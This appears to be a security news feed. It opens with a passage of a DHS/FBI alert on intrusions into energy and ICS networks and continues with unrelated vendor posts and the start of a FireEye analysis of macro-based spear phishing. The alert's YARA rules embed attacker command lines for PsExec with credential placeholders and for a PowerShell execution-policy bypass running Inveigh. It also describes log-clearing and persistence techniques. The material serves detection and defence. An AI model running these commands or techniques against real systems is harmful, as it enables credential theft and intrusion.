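    "<user1>             2       Disc       1+19:34         6/27/2017 12:35 PM")
```

Runs of such parsed rows can then be matched against expected logon patterns to spot the anomalous session times flagged in the detection guidance below.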


An additional batch script named “dirsb.bat” was used to gather folder and file names from hosts on the network.

In addition to the batch scripts, the threat actors also used scheduled tasks to collect screenshots with “scr.exe”. In two instances, the scheduled tasks were designed to run the command “C:\Windows\Temp\scr.exe” with the argument “C:\Windows\Temp\scr.jpg”. In another instance, the scheduled task was designed to run with the argument “pss.bat” from the local administrator’s “AppData\Local\Microsoft\” folder.

The threat actors commonly executed files out of various directories within the user’s AppData or Downloads folder. Some common directory names were

  • Chromex64,
  • Microsoft_Corporation,
  • NT,
  • Office365,
  • Temp, and
  • Update.


Targeting of ICS and SCADA Infrastructure

In multiple instances, the threat actors accessed workstations and servers on a corporate network that contained data output from control systems within energy generation facilities. The threat actors accessed files pertaining to ICS or supervisory control and data acquisition (SCADA) systems. Based on DHS analysis of existing compromises, these file names contained ICS vendor names and referenced ICS documents pertaining to the organization (e.g., “SCADA WIRING DIAGRAM.pdf” or “SCADA PANEL LAYOUTS.xlsx”).

The threat actors targeted and copied profile and configuration information for accessing ICS systems on the network. DHS observed the threat actors copying Virtual Network Connection (VNC) profiles that contained configuration information on accessing ICS systems. DHS was able to reconstruct screenshot fragments of a Human Machine Interface (HMI) that the threat actors accessed.

This image depicts a reconstructed screenshot of a Human Machine Interface (HMI) system that was accessed by the threat actor. This image demonstrates the threat actor's focus and interest in Industrial Control System (ICS) environments.


Cleanup and Cover Tracks

In multiple instances, the threat actors created new accounts on the staging targets to perform cleanup operations. The accounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote Services, and Audit. The threat actors also removed applications they installed while they were in the network, along with any logs produced. For example, the Fortinet client installed at one commercial facility was deleted along with the logs produced by its use. Finally, data generated by other accounts used on the accessed systems was deleted.

The threat actors cleaned up intended target networks by deleting the screenshots they had created and specific registry keys. Through forensic analysis, DHS determined that the threat actors deleted the Terminal Server Client registry key, which tracks connections made to remote systems. The threat actors also deleted all batch scripts, output text documents, and any tools they brought into the environment, such as “scr.exe”.


Detection and Response

IOCs related to this campaign are provided within the accompanying .csv and .stix files of this alert. DHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, network signatures, and YARA rules provided, and add the IPs to their watchlists to determine whether malicious activity has been observed within their organization. System owners are also advised to run the YARA tool on any system suspected to have been targeted by these threat actors.


Network Signatures and Host-Based Rules

This section contains network signatures and host-based rules that can be used to detect malicious activity associated with threat actor TTPs. Although these network signatures and host-based rules were created using a comprehensive vetting process, the possibility of false positives always remains.


Network Signatures

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/aspnet_client/system_web/4_0_30319/update/' (Beacon)"; sid:42000000; rev:1; flow:established,to_server; content:"/aspnet_client/system_web/4_0_30319/update/"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/img/bson021.dat'"; sid:42000001; rev:1; flow:established,to_server; content:"/img/bson021.dat"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/A56WY' (Callback)"; sid:42000002; rev:1; flow:established,to_server; content:"/A56WY"; http_uri; fast_pattern; classtype:bad-unknown; metadata:service http;)


alert tcp any any -> any 445 (msg:"SMB Client Request contains 'AME_ICON.PNG' (SMB credential harvesting)"; sid:42000003; rev:1; flow:established,to_server; content:"|FF|SMB|75 00 00 00 00|"; offset:4; depth:9; content:"|08 00 01 00|"; distance:3; content:"|00 5c 5c|"; distance:2; within:3; content:"|5c|AME_ICON.PNG"; distance:7; fast_pattern; classtype:bad-unknown; metadata:service netbios-ssn;)


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI OPTIONS contains '/ame_icon.png' (SMB credential harvesting)"; sid:42000004; rev:1; flow:established,to_server; content:"/ame_icon.png"; http_uri; fast_pattern:only; content:"OPTIONS"; nocase; http_method; classtype:bad-unknown; metadata:service http;)


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP Client Header contains 'User-Agent|3a 20|Go-http-client/1.1'"; sid:42000005; rev:1; flow:established,to_server; content:"User-Agent|3a 20|Go-http-client/1.1|0d 0a|Accept-Encoding|3a 20|gzip"; http_header; fast_pattern:only; pcre:"/\.(?:aspx|txt)\?[a-z0-9]{3}=[a-z0-9]{32}&/U"; classtype:bad-unknown; metadata:service http;)


alert tcp $EXTERNAL_NET [139,445] -> $HOME_NET any (msg:"SMB Server Traffic contains NTLM-Authenticated SMBv1 Session"; sid:42000006; rev:1; flow:established,to_client; content:"|ff 53 4d 42 72 00 00 00 00 80|"; fast_pattern:only; content:"|05 00|"; distance:23; classtype:bad-unknown; metadata:service netbios-ssn;)

YARA Rules

This is a consolidated rule set for malware associated with this activity. These rules were written by NCCIC and include contributions from trusted partners.



rule APT_malware_1
{
      meta:
            description = "inveigh pen testing tools & related artifacts"

            author = "DHS | NCCIC Code Analysis Team"    

            date = "2017/07/17"

            hash0 = "61C909D2F625223DB2FB858BBDF42A76"

            hash1 = "A07AA521E7CAFB360294E56969EDA5D6"

            hash2 = "BA756DD64C1147515BA2298B6A760260"

            hash3 = "8943E71A8C73B5E343AA9D2E19002373"

            hash4 = "04738CA02F59A5CD394998A99FCD9613"

            hash5 = "038A97B4E2F37F34B255F0643E49FC9D"

            hash6 = "65A1A73253F04354886F375B59550B46"

            hash7 = "AA905A3508D9309A93AD5C0EC26EBC9B"

            hash8 = "5DBEF7BDDAF50624E840CCBCE2816594"

            hash9 = "722154A36F32BA10E98020A8AD758A7A"

            hash10 = "4595DBE00A538DF127E0079294C87DA0"

      strings:
            $s0 = "file://"

            $s1 = "/ame_icon.png"

            $s2 = ""

            $s3 = { 87D081F60C67F5086A003315D49A4000F7D6E8EB12000081F7F01BDD21F7DE }

            $s4 = { 33C42BCB333DC0AD400043C1C61A33C3F7DE33F042C705B5AC400026AF2102 }

            $s5 = "(g.charCodeAt(c)^l[(l[b]+l[e])%256])"

            $s6 = "for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)"

            $s7 = "VXNESWJfSjY3grKEkEkRuZeSvkE="

            $s8 = "NlZzSZk="

            $s9 = "WlJTb1q5kaxqZaRnser3sw=="

            $s10 = "for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)"

            $s11 = "fromCharCode(d.charCodeAt(e)^k[(k[b]+k[h])%256])"

            $s12 = "ps.exe -accepteula \\%ws% -u %user% -p %pass% -s cmd /c netstat"

            $s13 = { 22546F6B656E733D312064656C696D733D5C5C222025254920494E20286C6973742E74787429 }

            $s14 = { 68656C6C2E657865202D6E6F65786974202D657865637574696F6E706F6C69637920627970617373202D636F6D6D616E6420222E202E5C496E76656967682E70 }

            $s15 = { 476F206275696C642049443A202266626433373937623163313465306531 }

//inveigh pentesting tools

            $s16 = { 24696E76656967682E7374617475735F71756575652E4164642822507265737320616E79206B657920746F2073746F70207265616C2074696D65 }

//specific malicious word document PK archive

            $s17 = { 2F73657474696E67732E786D6CB456616FDB3613FEFE02EF7F10F4798E64C54D06A14ED125F19A225E87C9FD0194485B }

            $s18 = { 6C732F73657474696E67732E786D6C2E72656C7355540500010076A41275780B0001040000000004000000008D90B94E03311086EBF014D6F4D87B48214471D2 }

            $s19 = { 8D90B94E03311086EBF014D6F4D87B48214471D210A41450A0E50146EBD943F8923D41C9DBE3A54A240ACA394A240ACA39 }

            $s20 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }

            $s21 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }

            $s22 = ""

            $s23 = ""

            $s24 = "/1/ree_stat/p"

            $s25 = "/icon.png"

            $s26 = "/pshare1/icon"

            $s27 = "/notepad.png"

            $s28 = "/pic.png"

            $s29 = ""

      condition:
            ($s0 and $s1 or $s2) or ($s3 or $s4) or ($s5 and $s6 or $s7 and $s8 and $s9) or ($s10 and $s11) or ($s12 and $s13) or ($s14) or ($s15) or ($s16) or ($s17) or ($s18) or ($s19) or ($s20) or ($s21) or ($s0 and $s22 or $s24) or ($s0 and $s22 or $s25) or ($s0 and $s23 or $s26) or ($s0 and $s22 or $s27) or ($s0 and $s23 or $s28) or ($s29)
}





rule APT_malware_2
{
      meta:
      description = "rule detects malware"

      author = "other"

      strings:
      $api_hash = { 8A 08 84 C9 74 0D 80 C9 60 01 CB C1 E3 01 03 45 10 EB ED }

      $http_push = "X-mode: push" nocase

      $http_pop = "X-mode: pop" nocase

      condition:
      any of them
}





rule Query_XML_Code_MAL_DOC_PT_2
{
     meta:
     name = "Query_XML_Code_MAL_DOC_PT_2"

     author = "other"

     strings:
            $zip_magic = { 50 4b 03 04 }

            $dir1 = "word/_rels/settings.xml.rels"

            $bytes = {8c 90 cd 4e eb 30 10 85 d7}

     condition:
            $zip_magic at 0 and $dir1 and $bytes
}





rule Query_Javascript_Decode_Function
{
      meta:
      name = "Query_Javascript_Decode_Function"

      author = "other"

      strings:
      $decode1 = {72 65 70 6C 61 63 65 28 2F 5B 5E 41 2D 5A 61 2D 7A 30 2D 39 5C 2B 5C 2F 5C 3D 5D 2F 67 2C 22 22 29 3B}

      $decode2 = {22 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F 3D 22 2E 69 6E 64 65 78 4F 66 28 ?? 2E 63 68 61 72 41 74 28 ?? 2B 2B 29 29}

      $decode3 = {3D ?? 3C 3C 32 7C ?? 3E 3E 34 2C ?? 3D 28 ?? 26 31 35 29 3C 3C 34 7C ?? 3E 3E 32 2C ?? 3D 28 ?? 26 33 29 3C 3C 36 7C ?? 2C ?? 2B 3D [1-2] 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29 2C 36 34 21 3D ?? 26 26 28 ?? 2B 3D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29}

      $decode4 = {73 75 62 73 74 72 69 6E 67 28 34 2C ?? 2E 6C 65 6E 67 74 68 29}

      condition:
      filesize < 20KB and #func_call > 20 and all of ($decode*)
}






rule Query_XML_Code_MAL_DOC
{
      meta:
      name = "Query_XML_Code_MAL_DOC"

      author = "other"

      strings:
      $zip_magic = { 50 4b 03 04 }

      $dir = "word/_rels/" ascii

      $dir2 = "word/theme/theme1.xml" ascii

      $style = "word/styles.xml" ascii

      condition:
      $zip_magic at 0 and $dir at 0x0145 and $dir2 at 0x02b7 and $style at 0x08fd
}





rule z_webshell
{
            meta:
            description = "Detection for the z_webshell"

            author = "DHS NCCIC Hunt and Incident Response Team"

            date = "2018/01/25"

            md5 = "2C9095C965A55EFC46E16B86F9B7D6C6"

            strings:
            $aspx_identifier1 = "<%@ " nocase ascii wide

            $aspx_identifier2 = "<asp:" nocase ascii wide

            $script_import = /(import|assembly) Name(space)?\=\"(System|Microsoft)/ nocase ascii wide

            $case_string = /case \"z_(dir|file|FM|sql)_/ nocase ascii wide

            $webshell_name = "public string z_progname =" nocase ascii wide

            $webshell_password = "public string Password =" nocase ascii wide

            condition:
            1 of ($aspx_identifier*)
            and #script_import > 10
            and #case_string > 7
            and 2 of ($webshell_*)
            and filesize < 100KB
}



These threat actors’ campaign has affected multiple organizations in the energy, nuclear, water, aviation, construction, and critical manufacturing sectors.


DHS and FBI encourage network users and administrators to use the following detection and prevention guidelines to help defend against this activity.


Network and Host-based Signatures

DHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, and YARA and Snort signatures provided and add the IPs to their watch list to determine whether malicious activity is occurring within their organization. Reviewing network perimeter netflow will help determine whether a network has experienced suspicious activity. Network defenders and malware analysts should use the YARA and Snort signatures provided in the associated YARA and .txt file to identify malicious activity.


Detections and Prevention Measures

  • Users and administrators may detect spear phishing, watering hole, web shell, and remote access activity by comparing all IP addresses and domain names listed in the IOC packages to the following locations:
    • network intrusion detection system/network intrusion protection system logs,
    • web content logs,
    • proxy server logs,
    • domain name server resolution logs,
    • packet capture (PCAP) repositories,
    • firewall logs,
    • workstation Internet browsing history logs,
    • host-based intrusion detection system /host-based intrusion prevention system (HIPS) logs,
    • data loss prevention logs,
    • exchange server logs,
    • user mailboxes,
    • mail filter logs,
    • mail content logs,
    • AV mail logs,
    • OWA logs,
    • Blackberry Enterprise Server logs, and
    • Mobile Device Management logs.
  • To detect the presence of web shells on external-facing servers, compare IP addresses, filenames, and file hashes listed in the IOC packages with the following locations:
    • application logs,
    • IIS/Apache logs,
    • file system,
    • intrusion detection system/ intrusion prevention system logs,
    • PCAP repositories,
    • firewall logs, and
    • reverse proxy.
  • Detect spear-phishing by searching workstation file systems and network-based user directories, for attachment filenames and hashes found in the IOC packages.
  • Detect persistence in VDI environments by searching file shares containing user profiles for all .lnk files.
  • Detect evasion techniques by the actors by identifying deleted logs. This can be done by reviewing last-seen entries and by searching for event 104 on Windows system logs.
  • Detect persistence by reviewing all administrator accounts on systems to identify unauthorized accounts, especially those created recently.
  • Detect the malicious use of legitimate credentials by reviewing the access times of remotely accessible systems for all users. Any unusual login times should be reviewed by the account owners.
  • Detect the malicious use of legitimate credentials by validating all remote desktop and VPN sessions of any user’s credentials suspected to be compromised.
  • Detect spear-phishing by searching OWA logs for all IP addresses listed in the IOC packages.
  • Detect spear-phishing through a network by validating all new email accounts created on mail servers, especially those with external user access.
  • Detect persistence on servers by searching system logs for all filenames listed in the IOC packages.
  • Detect lateral movement and privilege escalation by searching PowerShell logs for all filenames ending in “.ps1” contained in the IOC packages. (Note: requires PowerShell version 5, and PowerShell logging must be enabled prior to the activity.)
  • Detect persistence by reviewing all installed applications on critical systems for unauthorized applications, specifically note FortiClient VPN and Python 2.7.
  • Detect persistence by searching for the value of “REG_DWORD 100” at registry location “HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\MaxInstanceCount” and the value of “REG_DWORD 1” at location “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\dontdisplaylastusername”.
  • Detect installation by searching all proxy logs for downloads from URIs without domain names.
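Several of the detections above, such as identifying cleared logs via event 104, reduce to simple filters over exported event records. The sketch below is illustrative only; the record layout and the “tempadmin” account name are assumptions, not indicators from this alert.

```python
# Event ID 104 (Microsoft-Windows-Eventlog) in the Windows System log
# records "The log file was cleared" -- the evasion technique noted above.
def find_log_clears(events):
    """Return records indicating a cleared event log."""
    return [e for e in events if e.get("event_id") == 104]

# Hypothetical exported records for demonstration
sample_events = [
    {"event_id": 4624, "log": "Security", "user": "svc_backup"},
    {"event_id": 104, "log": "System", "user": "tempadmin"},
]
cleared = find_log_clears(sample_events)
```

In practice the same filter would run over events exported from a SIEM or from `wevtutil` output, correlated with recently created administrator accounts.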


General Best Practices Applicable to this Campaign:

  • Prevent external communication of all versions of SMB and related protocols at the network boundary by blocking TCP ports 139 and 445 with related UDP port 137. See the NCCIC/US-CERT publication on SMB Security Best Practices for more information.
  • Block the Web-based Distributed Authoring and Versioning (WebDAV) protocol on border gateway devices on the network.
  • Monitor VPN logs for abnormal activity (e.g., off-hour logins, unauthorized IP address logins, and multiple concurrent logins).
  • Deploy web and email filters on the network. Configure these devices to scan for known bad domain names, sources, and addresses; block these before receiving and downloading messages. This action will help to reduce the attack surface at the network’s first level of defense. Scan all emails, attachments, and downloads (both on the host and at the mail gateway) with a reputable anti-virus solution that includes cloud reputation services.
  • Segment any critical networks or control systems from business systems and networks according to industry best practices.
  • Ensure adequate logging and visibility on ingress and egress points.
  • Ensure the use of PowerShell version 5, with enhanced logging enabled. Older versions of PowerShell do not provide adequate logging of the PowerShell commands an attacker may have executed. Enable PowerShell module logging, script block logging, and transcription. Send the associated logs to a centralized log repository for monitoring and analysis. See the FireEye blog post Greater Visibility through PowerShell Logging for more information.
  • Implement the prevention, detection, and mitigation strategies outlined in the NCCIC/US-CERT Alert TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance.
  • Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis, and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.
  • Implement application directory whitelisting. System administrators may implement application or application directory whitelisting through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from PROGRAMFILES, PROGRAMFILES(X86), SYSTEM32, and any ICS software folders. All other locations should be disallowed unless an exception is granted.
  • Block RDP connections originating from untrusted external addresses unless an exception exists; review exceptions regularly for validity.
  • Store system logs of mission critical systems for at least one year within a security information event management tool.
  • Ensure applications are configured to log the proper level of detail for an incident response investigation.
  • Consider implementing HIPS or other controls to prevent unauthorized code execution.
  • Establish least-privilege controls.
  • Reduce the number of Active Directory domain and enterprise administrator accounts.
  • Based on the suspected level of compromise, reset all user, administrator, and service account credentials across all local and domain systems.
  • Establish a password policy to require complex passwords for all users.
  • Ensure that accounts for network administration do not have external connectivity.
  • Ensure that network administrators use non-privileged accounts for email and Internet access.
  • Use two-factor authentication for all authentication, with special emphasis on any external-facing interfaces and high-risk environments (e.g., remote access, privileged access, and access to sensitive data).
  • Implement a process for logging and auditing activities conducted by privileged accounts.
  • Enable logging and alerting on privilege escalations and role changes.
  • Periodically conduct searches of publicly available information to ensure no sensitive information has been disclosed. Review photographs and documents for sensitive data that may have been inadvertently included.
  • Assign sufficient personnel to review logs, including records of alerts.
  • Complete an independent security (as opposed to compliance) risk review.
  • Create and participate in information sharing programs.
  • Create and maintain network and system documentation to aid in timely incident response. Documentation should include network diagrams, asset owners, type of asset, and an incident response plan.


Report Notice

DHS encourages recipients who identify the use of tools or techniques discussed in this document to report information to DHS or law enforcement immediately. To request incident response resources or technical assistance, contact NCCIC at or 888-282-0870 and the FBI through a local field office or the FBI’s Cyber Division ( or 855-292-3937).


Revision History

  • March 15, 2018: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Android Security 2017 Year in Review

Our team’s goal is simple: secure more than two billion Android devices. It’s our entire focus, and we’re constantly working to improve our protections to keep users safe.
Today, we’re releasing our fourth annual Android Security Year in Review. We compile these reports to help educate the public about the many different layers of Android security, and also to hold ourselves accountable so that anyone can track our security work over time.
We saw really positive momentum last year and this post includes some, but not nearly all, of the major moments from 2017. To dive into all the details, you can read the full report at:

Google Play Protect

In May, we announced Google Play Protect, a new home for the suite of Android security services on nearly two billion devices. While many of Play Protect’s features had been securing Android devices for years, we wanted to make these more visible to help assure people that our security protections are constantly working to keep them safe.

Play Protect’s core objective is to shield users from Potentially Harmful Apps, or PHAs. Every day, it automatically reviews more than 50 billion apps, other potential sources of PHAs, and devices themselves and takes action when it finds any.

Play Protect uses a variety of different tactics to keep users and their data safe, but the impact of machine learning is already quite significant: 60.3% of all Potentially Harmful Apps were detected via machine learning, and we expect this to increase in the future.
Protecting users' devices
Play Protect automatically checks Android devices for PHAs at least once every day, and users can conduct an additional review at any time for some extra peace of mind. These automatic reviews enabled us to remove nearly 39 million PHAs last year.

We also update Play Protect to respond to trends that we detect across the ecosystem. For instance, we recognized that nearly 35% of new PHA installations were occurring when a device was offline or had lost network connectivity. As a result, in October 2017, we enabled offline scanning in Play Protect, and have since prevented 10 million more PHA installs.

Preventing PHA downloads
Devices that downloaded apps exclusively from Google Play were nine times less likely to get a PHA than devices that downloaded apps from other sources. And these security protections continue to improve, partially because of Play Protect’s increased visibility into newly submitted apps to Play. It reviewed 65% more Play apps compared to 2016.

Play Protect also doesn’t just secure Google Play—it helps protect the broader Android ecosystem as well. Thanks in large part to Play Protect, the installation rates of PHAs from outside of Google Play dropped by more than 60%.

Security updates

While Google Play Protect is a great shield against PHAs, we also partner with device manufacturers to make sure that the version of Android running on users' devices is up to date and secure.

Throughout the year, we worked to improve the process for releasing security updates, and 30% more devices received security patches than in 2016. Furthermore, no critical security vulnerabilities affecting the Android platform were publicly disclosed without an update or mitigation available for Android devices. This was possible due to the Android Security Rewards Program, enhanced collaboration with the security researcher community, coordination with industry partners, and built-in security features of the Android platform.

New security features in Android Oreo

We introduced a slew of new security features in Android Oreo: making it safer to get apps, dropping insecure network protocols, providing more user control over identifiers, hardening the kernel, and more.

We highlighted many of these over the course of the year, but some may have flown under the radar. For example, we updated the overlay API so that apps can no longer block the entire screen and prevent you from dismissing them, a common tactic employed by ransomware.

Openness makes Android security stronger

We’ve long said it, but it remains truer than ever: Android’s openness helps strengthen our security protections. For years, the Android ecosystem has benefitted from researchers’ findings, and 2017 was no different.

Security reward programs
We continued to see great momentum with our Android Security Rewards program: we paid researchers $1.28 million, pushing our total rewards past $2 million since the program began. We also increased our top-line payouts for exploits that compromise TrustZone or Verified Boot from $50,000 to $200,000, and remote kernel exploits from $30,000 to $150,000.

In parallel, we introduced the Google Play Security Rewards Program, offering a bonus bounty to researchers who discover and disclose select critical vulnerabilities in apps hosted on Play to those apps' developers.

External security competitions
Our teams also participated in external vulnerability discovery and disclosure competitions, such as Mobile Pwn2Own. At the 2017 Mobile Pwn2Own competition, no exploits successfully compromised the Google Pixel. And of the exploits demonstrated against devices running Android, none could be reproduced on a device running unmodified Android source code from the Android Open Source Project (AOSP).

We’re pleased to see the positive momentum behind Android security, and we’ll continue our work to improve our protections this year, and beyond. We will never stop our work to ensure the security of Android users.

Introducing CA Veracode Verified

Are you struggling to respond to customer and prospect concerns about the security of your application? Do you know what good application security looks like, or how to get there?

CA Veracode is pleased to announce the CA Veracode Verified program. With CA Veracode Verified, you prove at a glance that you’ve made security a priority, and that your security program is backed by one of the most trusted names in the industry. Without straining limited security resources, you’ll stay ahead of customer and prospect security concerns, speeding your sales cycle. In addition, the CA Veracode Verified program gives you a proven roadmap for maturing your application security program.

What is CA Veracode Verified?

CA Veracode Verified is an attestation of the process that a development team has in place to assess the security of an identified application. There are three tiers of the CA Veracode Verified program: You progress from Standard to Team to Continuous as your program matures and expands to include third-party components and secure coding strategies beyond just assessing the first-party code developed in-house. Check out our infographic for more details on each tier.

How will CA Veracode Verified benefit me?

Speed sales cycles: If your customers and prospects aren’t asking about the security of your software, they will be. With the increase in damaging breaches making headlines, customers, both consumers and businesses, will increasingly request assurance that your products won’t leave them vulnerable. But reacting to individual prospect or customer concerns about security for every application is a time-consuming and expensive endeavor that lengthens, or even ends, sales cycles. With CA Veracode Verified, you stay ahead of the security concerns by proving at a glance that your application was developed with security in mind, making security your competitive advantage!

Prove the security of your development process: CA Veracode Verified attests that your development team implements secure coding practices and has integrated security into the development process. This attestation assures your customers that you were focused on security from the start when building this product, and that you’ve made secure code an element of high-quality code. It also gives you third-party validation of the security of your software with one of the most respected and trusted names in the security industry. The Verified attestation is backed by CA Veracode’s industry-leading platform and programmatic approach, 10+ years’ experience, more than 65 trillion lines of code scanned and more than 30 million flaws fixed.

Don’t strain limited security resources responding to customer and prospect requests for security attestations: Remove your limited security resources from the endless firefighting that is responding to customer and prospect requests for security attestation. The CA Veracode Verified seal fosters confidence and trust in your products so that your security teams can focus resources on other value-added tasks and initiatives.

Articulate the value of investment in security to the Board: When security speeds sales cycles and frees up resources, the Board takes notice. Additionally, by moving through each tier, you can use the Verified program to demonstrate progress in application security initiatives and the value of the investment.

Is your app Verified?

Have you started down the AppSec path? As a CA Veracode customer, you might be Verified already! Check out our infographic for details on each level. If your application qualifies for a Verified status, there are a few ways you can promote the security you have built into your application, including a Verified seal you can display on your website, an attestation letter you can share with customers and prospects, and a press release template you can use to share the news. We’ll also add your name to our Verified Directory, visible to your prospects, customers and competitors.

Want to get Verified, or move up to Verified Team or Verified Continuous? Check out our eBook to see what that entails, and contact us to get started!

Give your customers confidence that your software is secure …Verify it.

Work On It Together – Business Security Weekly #77

This week, Michael and Paul interview Futurist Thornton May, and CSO of Cisco Systems, Inc., Edna Conway! Then the articles of discussion and tracking security innovation! All that and more, on this episode of Business Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Voice Bio, Deep Neural Networks, and the Search for a Seamless Customer Experience

Opus Research and Pindrop Discuss the Future of Voice

The trial period for voice biometrics is over: its proof points have been established, with customer experience, efficiencies, and fraud in mind. Voice biometrics, with help from deep neural networks (DNNs), allows fraud attacks to be mitigated through multi-layered solutions.

Last week, the founder of Opus Research, Dan Miller, and the Director of Authentication at Opus, Ravin Sanjith, sat down with Matt Garland, our VP of Research, for a conversation about the current state and potential evolution of voice biometrics.

As we navigate through different channels, the purpose of voice biometrics remains the same: to provide a unique, secure element to a multi-factored authentication solution. Within the phone channel, and specifically the call center, voice biometrics alone can only do so much, and the human factor serves as a perennial risk. Fraudsters continue to take advantage of the call center, where fraud often originates, with vishing and social engineering attacks, causing a snowball effect and pushing fraud into other channels. This common occurrence validates the need for continuity in authentication as we move freely between channels.

Previous challenges faced in biometrics have been met with new technology, including DNNs: a series of layers of nodes that work as function approximators. These DNNs break down problems and teach the networks new functions, enhancing voice biometrics. Additionally, DNNs enable text independence for voice biometric systems, with passive enrollment that ensures a seamless customer experience. To learn more about voice biometrics and deep neural networks, watch the on-demand session here.
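As a rough sketch of the "layers of nodes acting as function approximators" idea, here is a minimal feedforward layer in Python. All weights and inputs are made-up illustrative numbers, not values from any real voice-biometric model:

```python
import math

def dense_layer(inputs, weights, biases):
    """One fully connected layer: weighted sum per node, then a tanh nonlinearity.

    Stacking layers like this is what lets a deep network approximate
    complicated functions, such as mapping audio features to a speaker identity.
    """
    outputs = []
    for node_weights, bias in zip(weights, biases):
        z = sum(w * x for w, x in zip(node_weights, inputs)) + bias
        outputs.append(math.tanh(z))  # squashes each node's output into (-1, 1)
    return outputs

# Toy example: 3 input features feeding 2 nodes (all numbers are illustrative)
features = [0.5, -1.2, 0.3]
layer_out = dense_layer(
    features,
    weights=[[0.1, 0.4, -0.2], [-0.3, 0.8, 0.5]],
    biases=[0.0, 0.1],
)
```

A real DNN for voice biometrics stacks many such layers and learns the weights from training data rather than hand-writing them.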

The post Voice Bio, Deep Neural Networks, and the Search for a Seamless Customer Experience appeared first on Pindrop.

Debunking Common GDPR Myths

Many impacted organisations remain unprepared for – or even unaware of – GDPR. To help mitigate the risks of noncompliance, it’s critical to understand the realities of the new data protection laws.


Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign


From January 2018 to March 2018, through FireEye’s Dynamic Threat Intelligence, we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East.

We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. The spear phishing emails and attached malicious macro documents typically have geopolitical themes. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS.

One of the more interesting observations during the analysis of these files was the re-use of the latest AppLocker bypass and lateral movement techniques for the purpose of indirect code execution. The IP address in the lateral movement techniques was substituted with the local machine IP address to achieve code execution on the system.

Campaign Timeline

In this campaign, the threat actor’s tactics, techniques and procedures (TTPs) shifted after about a month, as did their targets. A brief timeline of this activity is shown in Figure 1.

Figure 1: Timeline of this recently observed spear phishing campaign

The first part of the campaign (from Jan. 23, 2018, to Feb. 26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains a Base64-encoded PowerShell command, which is decoded and executed by PowerShell via a command line that the VBS file generates when it is run by WScript.exe. The process chain is shown in Figure 2.

Figure 2: Process chain for the first part of the campaign

Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of the process tree, its final purpose remained the same: invoking PowerShell to decode the Base64 encoded PowerShell command in the INI file that was dropped earlier by the macro, and executing it. One such example of the VBS invoking PowerShell via MSHTA is shown in Figure 3.

Figure 3: VBS invoking PowerShell via MSHTA

The second part of the campaign (from Feb. 27, 2018, to March 5, 2018) used a new variant of the macro that does not use VBS for PowerShell code execution. Instead, it uses one of the recently disclosed code execution techniques leveraging INF and SCT files, which we will go on to explain later in the blog.

Infection Vector

We believe the infection vector for all of the attacks in this campaign is a macro-based document sent as an email attachment. One such email that we were able to obtain was targeting users in Turkey, as shown in Figure 4:

Figure 4: Sample spear phishing email containing macro-based document attachment

The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey, Pakistan, Tajikistan and India. Four examples follow; a complete list is available in the Indicators of Compromise section at the end of the blog.

Figure 5 shows a document purporting to be from the National Assembly of Pakistan.

Figure 5: Document purporting to be from the National Assembly of Pakistan

A document purporting to be from the Turkish Armed Forces, with content written in the Turkish language, is shown in Figure 6.

Figure 6: Document purporting to be from the Turkish Armed Forces

A document purporting to be from the Institute for Development and Research in Banking Technology (established by the Reserve Bank of India) is shown in Figure 7.

Figure 7: Document purporting to be from the Institute for Development and Research in Banking Technology

Figure 8 shows a document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan.

Figure 8: Document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan

Each of these macro-based documents used similar techniques for code execution, persistence and communication with the command and control (C2) server.

Indirect Code Execution Through INF and SCT

This scriptlet code execution technique leveraging INF and SCT files was recently discovered and documented in February 2018. The threat group in this recently observed campaign – TEMP.Zagros – weaponized their malware using the following techniques.

The macro in the Word document drops three files in a hard coded path: C:\programdata. Since the path is hard coded, execution will only be observed on operating systems where it exists: Windows 7 and above. The three files are:

  • Defender.sct – The malicious JavaScript based scriptlet file.
